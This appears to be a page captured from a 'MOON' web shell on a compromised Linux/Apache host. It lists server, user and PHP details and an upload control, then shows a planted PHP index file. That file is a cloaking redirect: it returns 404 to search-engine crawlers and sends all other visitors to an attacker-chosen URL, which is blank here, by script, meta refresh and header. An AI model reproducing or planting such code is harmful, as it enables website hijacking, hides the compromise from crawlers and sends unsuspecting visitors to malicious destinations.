MOON
Server: Apache
System: Linux server1.oystertel.com 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
User: buchabicpanel (1008)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/buchabicpanel/www/index.php1664344774
<?php

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
	header('HTTP/1.0 404 Not Found');
	exit;
}

$url = ''; 
echo "<script>window.location.href='$url';</script>";
echo "<meta http-equiv='refresh' content='0;URL=$url'>";
header("Location: $url");

?>